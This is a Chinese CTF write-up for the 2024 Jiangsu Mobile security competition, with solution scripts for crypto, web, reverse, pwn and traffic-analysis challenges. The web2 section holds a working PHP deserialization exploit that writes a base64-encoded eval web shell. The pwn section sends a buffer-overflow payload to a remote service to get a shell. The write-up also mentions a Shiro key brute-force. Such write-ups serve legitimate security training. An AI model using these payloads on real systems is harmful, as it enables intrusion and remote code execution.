江苏移动网络安全竞赛2024(初赛)

前言：摸摸鱼啦，ai小子的wp

Crypto

easy-sm

爆破后六位密码即可，用ai写一下，跑大约一分钟多一些，可以尝试多线程

from gmssl import sm3, func

# 给定的哈希值
target_hash = "f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0"

# 生成可能的密码并比较
def crack_password():
    prefix = "admin"
    for num in range(1000000):  # 6 位数字范围
        suffix = f"{num:06}"  # 补全为 6 位
        password = prefix + suffix
        # 计算密码的哈希值
        hash_value = sm3.sm3_hash(func.bytes_to_list(password.encode()))
        if hash_value == target_hash:
            return password
    return None

# 执行破解
password = crack_password()
if password:
    print(f"找到密码：flag{{{password}}}")
else:
    print("未找到匹配的密码")

easy-train

先进行base62,再进行atbash,根据uuid的特性rot13调整字母的合理范围

然后随波逐流爆破看看得到flag

web

web签到

shrio框架，用onefox里的框架工具进行

先爆破密钥

然后直接命令执行就行

web2

<?php
highlight_file(__FILE__);
class Who{
    public $char;
    public function __construct(){
        $this->char = new Zhangsan;
    }
    public function __toString(){
        if (isset($this->char)){
            return $this->char->Nihao();
        }else{
            return "You look upset";
        }
    }
}
class Lisi{
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
        
    }
    public function Nihao(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Zhangsan{
    public function Nihao(){
        return "I'm so happy";
    }
}

echo unserialize($_GET['a']);

上个源码，定位关键代码有个死亡绕过，用base64进行绕过解密即可，上exp

<?php
class Who{
    public $char;
    public function __construct(){
        $this->char = new Zhangsan;
    }
    public function __toString(){
        if (isset($this->char)){
            return $this->char->Nihao();
        }else{
            return "You look upset";
        }
    }
}
class Lisi{
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
        
    }
    public function Nihao(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Zhangsan{
    public function Nihao(){
        return "I'm so happy";
    }
}

$exp=new Who;
$exp->char =  new Lisi;
$exp->char->file ="php://filter/write=convert.base64-decode/resource=orange.php";
$exp->char->text ="aaaPD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=";
// 需要匹配构成四的倍数
echo urlencode(serialize($exp));

O%3A3%3A%22Who%22%3A1%3A%7Bs%3A4%3A%22char%22%3BO%3A4%3A%22Lisi%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A60%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Dorange.php%22%3Bs%3A4%3A%22text%22%3Bs%3A35%3A%22aaaPD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4%3D%22%3B%7D%7D

最后命令执行即可

re

RE签到

直接看附件拼接就行

strcpy(v5, "flag{");
 strcat(v5, "re_1");
 strcat(v5, "basic_re");
 strcat(v5, "_12}");
 printf("Welcome!");

flag{re_1basic_re_12}

HappySunday

ida打开看主函数

要求输入以 flag{ 开头，并且最后有一个 } 字符，输入的字符串进入 sub-140001010 函数和 sub_140001630 函数 ，如然后再进入 sub_140001680 函数，如果对比成功，则输 出”successed”

看一下1010的内容

来像 base64 编码流程，进入4400看一下内容

先转化为字符能得到类似 base64 表 ： ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/

ida_chars = [0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A,
0x4B, 0x4C, 0x4D, 0x4E, 0x30, 0x50, 0x51, 0x52, 0x53, 0x54,
0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64,
0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E,
0x4F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
0x79, 0x7A, 0x6F, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
0x38, 0x39, 0x2B, 0x2F]
for i in range(len(ida_chars)):
print(chr(ida_chars[i]),end="")

进到1630里

可以看到是一个循环，与 0x78 异或

写exp

import base64
result = ""
chars = [0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40, 0x17, 0x20,
0x49, 0x31, 0x02, 0x2D, 0x02, 0x1C, 0x1E, 0x35, 0x3D, 0x4D,
0x1E, 0x1B, 0x49, 0x2E, 0x0D, 0x2A, 0x3C, 0x2A, 0x4D, 0x2D,
0x00, 0x00]
for i in range(0,29):
    chars[i]=chars[i]^0x78
result = ''.join([chr(a) for a in chars])
CHAR_DATA ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
New = "ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/"
print(base64.b64decode(result.translate(str.maketrans(New, CHAR_DATA))))

pwn

pwn1

直接溢出进到sh里就行

from pwn import *
p = remote('221.178.230.105', 35765)
payload = b'a'*16 + b'admin'
p.sendline(payload)
p.interactive()

Misc

keyboard

敲击码流量包

网上搜个脚本一把梭就行了，没有难度

#!/usr/bin/env python
# coding:utf-8
import argparse
import os
from tempfile import NamedTemporaryFile

BOOT_KEYBOARD_MAP = {
    0x00: (None, None),                         # Reserved (no event indicated)
    0x01: ('', ''),                             # ErrorRollOver
    0x02: ('', ''),                             # POSTFail
    0x03: ('', ''),                             # ErrorUndefined
    0x04: ('a', 'A'),                           # a
    0x05: ('b', 'B'),                           # b
    0x06: ('c', 'C'),                           # c
    0x07: ('d', 'D'),                           # d
    0x08: ('e', 'E'),                           # e
    0x09: ('f', 'F'),                           # f
    0x0a: ('g', 'G'),                           # g
    0x0b: ('h', 'H'),                           # h
    0x0c: ('i', 'I'),                           # i
    0x0d: ('j', 'J'),                           # j
    0x0e: ('k', 'K'),                           # k
    0x0f: ('l', 'L'),                           # l
    0x10: ('m', 'M'),                           # m
    0x11: ('n', 'N'),                           # n
    0x12: ('o', 'O'),                           # o
    0x13: ('p', 'P'),                           # p
    0x14: ('q', 'Q'),                           # q
    0x15: ('r', 'R'),                           # r
    0x16: ('s', 'S'),                           # s
    0x17: ('t', 'T'),                           # t
    0x18: ('u', 'U'),                           # u
    0x19: ('v', 'V'),                           # v
    0x1a: ('w', 'W'),                           # w
    0x1b: ('x', 'X'),                           # x
    0x1c: ('y', 'Y'),                           # y
    0x1d: ('z', 'Z'),                           # z
    0x1e: ('1', '!'),                           # 1
    0x1f: ('2', '@'),                           # 2
    0x20: ('3', '#'),                           # 3
    0x21: ('4', '$'),                           # 4
    0x22: ('5', '%'),                           # 5
    0x23: ('6', '^'),                           # 6
    0x24: ('7', '&'),                           # 7
    0x25: ('8', '*'),                           # 8
    0x26: ('9', '('),                           # 9
    0x27: ('0', ')'),                           # 0
    0x28: ('\n', '\n'),                         # Return (ENTER)
    0x29: ('[ESC]', '[ESC]'),                   # Escape
    0x2a: ('\b', '\b'),                         # Backspace
    0x2b: ('\t', '\t'),                         # Tab
    0x2c: (' ', ' '),                           # Spacebar
    0x2d: ('-', '_'),                           # -
    0x2e: ('=', '+'),                           # =
    0x2f: ('[', '{'),                           # [
    0x30: (']', '}'),                           # ]
    0x31: ('\\', '|'),                          # \
    0x32: ('', ''),                             # Non-US # and ~
    0x33: (';', ':'),                           # ;
    0x34: ('\'', '"'),                          # '
    0x35: ('`', '~'),                           # `
    0x36: (',', '<'),                           # ,
    0x37: ('.', '>'),                           # .
    0x38: ('/', '?'),                           # /
    0x39: ('[CAPSLOCK]', '[CAPSLOCK]'),         # Caps Lock
    0x3a: ('[F1]', '[F1]'),                     # F1
    0x3b: ('[F2]', '[F2]'),                     # F2
    0x3c: ('[F3]', '[F3]'),                     # F3
    0x3d: ('[F4]', '[F4]'),                     # F4
    0x3e: ('[F5]', '[F5]'),                     # F5
    0x3f: ('[F6]', '[F6]'),                     # F6
    0x40: ('[F7]', '[F7]'),                     # F7
    0x41: ('[F8]', '[F8]'),                     # F8
    0x42: ('[F9]', '[F9]'),                     # F9
    0x43: ('[F10]', '[F10]'),                   # F10
    0x44: ('[F11]', '[F11]'),                   # F11
    0x45: ('[F12]', '[F12]'),                   # F12
    0x46: ('[PRINTSCREEN]', '[PRINTSCREEN]'),   # Print Screen
    0x47: ('[SCROLLLOCK]', '[SCROLLLOCK]'),     # Scroll Lock
    0x48: ('[PAUSE]', '[PAUSE]'),               # Pause
    0x49: ('[INSERT]', '[INSERT]'),             # Insert
    0x4a: ('[HOME]', '[HOME]'),                 # Home
    0x4b: ('[PAGEUP]', '[PAGEUP]'),             # Page Up
    0x4c: ('[DELETE]', '[DELETE]'),             # Delete Forward
    0x4d: ('[END]', '[END]'),                   # End
    0x4e: ('[PAGEDOWN]', '[PAGEDOWN]'),         # Page Down
    0x4f: ('[RIGHTARROW]', '[RIGHTARROW]'),     # Right Arrow
    0x50: ('[LEFTARROW]', '[LEFTARROW]'),       # Left Arrow
    0x51: ('[DOWNARROW]', '[DOWNARROW]'),       # Down Arrow
    0x52: ('[UPARROW]', '[UPARROW]'),           # Up Arrow
    0x53: ('[NUMLOCK]', '[NUMLOCK]'),           # Num Lock
    0x54: ('[KEYPADSLASH]', '/'),               # Keypad /
    0x55: ('[KEYPADASTERISK]', '*'),            # Keypad *
    0x56: ('[KEYPADMINUS]', '-'),               # Keypad -
    0x57: ('[KEYPADPLUS]', '+'),                # Keypad +
    0x58: ('[KEYPADENTER]', '[KEYPADENTER]'),   # Keypad ENTER
    0x59: ('[KEYPAD1]', '1'),                   # Keypad 1 and End
    0x5a: ('[KEYPAD2]', '2'),                   # Keypad 2 and Down Arrow
    0x5b: ('[KEYPAD3]', '3'),                   # Keypad 3 and PageDn
    0x5c: ('[KEYPAD4]', '4'),                   # Keypad 4 and Left Arrow
    0x5d: ('[KEYPAD5]', '5'),                   # Keypad 5
    0x5e: ('[KEYPAD6]', '6'),                   # Keypad 6 and Right Arrow
    0x5f: ('[KEYPAD7]', '7'),                   # Keypad 7 and Home
    0x60: ('[KEYPAD8]', '8'),                   # Keypad 8 and Up Arrow
    0x61: ('[KEYPAD9]', '9'),                   # Keypad 9 and Page Up
    0x62: ('[KEYPAD0]', '0'),                   # Keypad 0 and Insert
    0x63: ('[KEYPADPERIOD]', '.'),              # Keypad . and Delete
    0x64: ('', ''),                             # Non-US \ and |
    0x65: ('', ''),                             # Application
    0x66: ('', ''),                             # Power
    0x67: ('[KEYPADEQUALS]', '='),              # Keypad =
    0x68: ('[F13]', '[F13]'),                   # F13
    0x69: ('[F14]', '[F14]'),                   # F14
    0x6a: ('[F15]', '[F15]'),                   # F15
    0x6b: ('[F16]', '[F16]'),                   # F16
    0x6c: ('[F17]', '[F17]'),                   # F17
    0x6d: ('[F18]', '[F18]'),                   # F18
    0x6e: ('[F19]', '[F19]'),                   # F19
    0x6f: ('[F20]', '[F20]'),                   # F20
    0x70: ('[F21]', '[F21]'),                   # F21
    0x71: ('[F22]', '[F22]'),                   # F22
    0x72: ('[F23]', '[F23]'),                   # F23
    0x73: ('[F24]', '[F24]'),                   # F24
}


def parse_boot_keyboard_report(data: bytearray):
    modifiers = data[0] 
    keys = data[2:8]      

    ctrl = (modifiers & 0x11) != 0
    shift = (modifiers & 0x22) != 0
    alt = (modifiers & 0x44) != 0
    gui = (modifiers & 0x88) != 0

    characters = []
    for key in keys:
        if key != 0:
            if key in BOOT_KEYBOARD_MAP:
                characters.append(BOOT_KEYBOARD_MAP[key][shift])
            else:
                characters.append(None)
    return (ctrl, shift, alt, gui, characters)


def help_formatter(prog):
    return argparse.HelpFormatter(prog, max_help_position=40)


def main():
    parser = argparse.ArgumentParser(
        description='Parse keyboard report data and output as text', formatter_class=help_formatter)
    parser.add_argument('pcapng_file', help='path to the pcapng file')
    args = parser.parse_args()

    tmpfile = NamedTemporaryFile(delete=False)
    tmpfile.close()

    command = "tshark -r %s -T fields -e usbhid.data -e usb.capdata > %s" % (
        args.pcapng_file, tmpfile.name)
    os.system(command)

    with open(tmpfile.name, 'r') as f:
        lines = f.readlines()

    os.unlink(tmpfile.name)

    text = ""
    for line in lines:
        capdata = line.strip().replace(':', '')
        if capdata:
            data = bytearray.fromhex(capdata)
            characters = parse_boot_keyboard_report(data)[-1]
            for character in characters:
                if character:
                    text += character
        else:
            pass

    raw_text = repr(text)
    print(f'Raw output:\n{raw_text}')
    print(f'Text output:\n{text}')


if __name__ == "__main__":
    main()

bft

根据题目消息是bft隐写，用bfttools得到文本

+++++++++[->+++++++++<]>+++++++++.<++++[->++++<]>+++.<+++[->+++<]>++.<++++[->----<]>.<+++[->---<]>-----.<++++++[->------<]>---.<++++++++[->++++++++<]>.+++++++.<++++++[->------<]>---------.<+++++[->+++++<]>++++.------.++++.<+++++[->-----<]>-.<+++++[->+++++<]>++++++.<+++++[->-----<]>-------.<+++++[->-----<]>----.<+++++[->+++++<]>++++.<++++++[->++++++<]>+++++++++.<+++++++[->-------<]>--------.<++++[->----<]>-.<++++++[->++++++<]>+++++.--.------.<+++++[->-----<]>-------.<+++++[->+++++<]>+++++.+++++.-------.<+++++[->-----<]>.<++++++[->++++++<]>++.---.<++++[->----<]>-.<++++++[->++++++<]>+++.<+++++[->-----<]>-------.------.<+++[->+++<]>++++++.<++++[->++++<]>+++++++.<++++[->----<]>----.<++++[->++++<]>+.<++++[->----<]>.<++++[->++++<]>.<++++[->----<]>-.<+++++[->+++++<]>++++++++.<++++++[->------<]>--------.<+++++[->+++++<]>+++++.<+++++[->-----<]>-----.++++++.------.<+++++[->+++++<]>++++.<++++[->----<]>--.<++++++[->------<]>--.---.<+++[->+++<]>++++.<

在线解码一下

然后base解密就行

得到flag{327a6c4304ad5938eaf0efb6cc3e53dc}

dns

dns.qry.name有数据，tshark转json，正则提取

import re

# 打开文件并逐行处理
with open("orange.json", "r", encoding='utf-8') as f:
    data = (match.group(1) for line in f for match in [re.search(r'"dns\.qry\.name": "([0123456789abcdef]+)\.\d+\.\d+\.\d+\.\d+"', line)] if match)

    # 使用生成器过滤数据并按要求取出每四个一组
    result = [dns for i, dns in enumerate(data) if i % 4 == 0]

# 将结果合并为一个字符串
d = ''.join(result)
print(d)

先

tshark -T json -r dns.pcap > orange.json

再执行脚本得到

56476870637942706379426849484e6c59334a6c64434230636d4675633231706448526c5a43423061484a766457646f494752756379427864575679655341364b534247544546484c555a554e44646a545667794e6e425865555a5453545a53554664685533493157564a330a

最后厨子解密得到flag